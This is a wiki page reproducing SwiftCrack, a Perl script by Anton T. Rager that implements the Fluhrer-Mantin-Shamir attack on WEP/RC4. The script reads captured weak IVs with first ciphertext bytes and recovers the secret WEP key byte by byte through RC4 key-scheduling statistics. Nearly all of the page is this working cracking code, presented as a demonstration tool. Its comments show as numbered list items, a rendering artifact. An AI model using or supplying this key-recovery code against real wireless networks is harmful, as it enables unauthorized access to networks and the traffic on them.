SwiftCrack

From SecurityForest

  1. !/usr/bin/perl
  1. Basic WEP/RC4 crack tool that demonstrates the key scheduling weaknesses
  2. described in the paper "Weakness in the Key Scheduling Algorithm of RC4"
  3. written by Scott Fluhrer, Itsik Mantin, and Adi Shamir.
  5. script relies on existance of file with list of IVs and 1st encrypted
  6. output byte to produce the secret key originally used to encrypt the
  7. list of IVs. Scripts WeakIVGen.pl and pcap-getIV.pl are included to
  8. produce/capture weak IVs and produce the logfile this script expects.
  10. By : Anton T. Rager
  11. a_rager@yahoo.com
  12. 08/09/2001-08/12/2001 - initial code to demo FMS attack
  13. 10/05/2004 - updated original 3yr old code to process generic resolved IVs

$i=0; $j=0; $ik=0; $x=0;


  1. 802.2 SNAP Header should be 1st plaintext byte of WEP packet

@text = (0xaa);


if (!-f "IVFile.log") { die("Error :\nNo IVFile.log file found - run WeakIVGen.pl or pcap-getIV.pl 1st to generate file\n");

}

  1. Keysize 11 byte or 5 byte

open (IVFILE, "IVFile.log"); @IVList=<IVFILE>; close (IVFILE);

$keysize=$IVList[0]; chomp($keysize); splice(@IVList, 0, 1);

$bitsize=$keysize*8; print("Keysize = $keysize \[$bitsize bits\]\n");


for ($B=0; $B < $keysize; $B++) {

# Init statistics array for ($i=0; $i < 256; $i++) { $stat[$i]=0; }

foreach $IVRec (@IVList) {

@IV=split(" ",$IVRec); $key[0]=$IV[0]; $key[1]=$IV[1]; $key[2]=$IV[2]; $encr=$IV[3];

  1. if ($key[0] eq $B+3) {



  1. Look for matching IV for 1st Key byte

$i=0; $j=0; $ik=0;

for ($i=0; $i<256; $i++) { $S[$i]=$i;

}

# 0 to 3+K[b] for ($i=0; $i< $B + 3; $i++) { $j=($j+$S[$i]+$key[$i]) % 256; $temp = $S[$i]; $S[$i] = $S[$j]; $S[$j] = $temp; if ($i eq 1) { $S1[0]=$S[0]; $S1[1]=$S[1]; }

}


$X=$S[1]; if ($X < $B + 3) { if ($X+$S[$X] eq $B + 3) { 

                			if ($S[0] ne $S1[0] || $S[1] ne $S1[1]) {

#print("Throwaway IV $IV[0], $IV[1], $IV[2]\n"); }

  1. Xor inbyte and outbyte to get S[3]
  2. plugin S[3] as J and subtract (5+x+S[3]) to get K

$S3Calc = $encr ^ $text[0]; $leaker = $S3Calc-$j-$S[$i] %256; $stat[$leaker]++; } }


$max=0; $count=0; foreach $rank (@stat) { if ($rank > $max) { $max=$rank; $winner=$count; } $count++; }

  1. }

} print("$winner "); push (@key, $winner);

} print("\n");

Retrieved from "http://www.securityforest.com/wiki/index.php/SwiftCrack"
Advertisement